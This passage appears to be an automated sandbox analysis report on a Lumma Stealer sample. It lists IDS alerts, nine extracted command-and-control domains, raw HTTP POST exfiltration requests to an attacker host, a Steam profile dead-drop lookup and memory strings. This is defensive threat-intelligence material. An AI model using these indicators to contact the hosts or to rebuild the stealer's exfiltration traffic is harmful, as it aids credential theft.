Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_009E97E7
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009E7757
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009E7757
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	0_2_009FC8BA
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	0_2_00A1887B
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp eax	0_2_00A1898E
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	0_2_00A1C9CE
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00A0A967
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	0_2_009EB973
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then jmp eax	0_2_00A09AB5
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_009FDAB8
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]	0_2_009F4ACD
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx eax, word ptr [edx]	0_2_009F9A29
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_009F9A29
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_009F9A29
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	0_2_009FEA27
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then mov edx, ecx	0_2_00A18A77
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	0_2_00A18A77
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	0_2_00A18A77
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then test eax, eax	0_2_00A18A77
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]	0_2_009F4BD2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058486 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (driblbemris .lat) : 192.168.2.6:64596 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:65480 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.6:61991 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.6:54193 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:60290 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:56432 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.6:58652 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.6:49675 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.6:52984 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49731 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49741 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49741 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49754 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49747 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49747 -> 172.67.157.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: driblbemris.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 104.121.10.34 104.121.10.34

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49766 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49731 -> 104.121.10.34:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49747 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49775 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BYU3IODR3WM2QUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EQIPKNMVI4UEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ODJUR9FC501SNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19928Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: heckout.steampowered.com/ https://www.youtube.com https: equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: driblbemris.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic	DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic	DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic	DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic	DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic	DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: lev-tolstoi.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com

Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.c
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.cC
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fast
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalP
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66E
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=eng
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.co
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000002.2561087270.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/Contec&
Source: IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2368255183.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/api
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/apib
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/fC62K
Source: IzDjbVdHha.exe, 00000000.00000002.2561087270.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/pi
Source: IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lev-tolstoi.com/ybh2
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
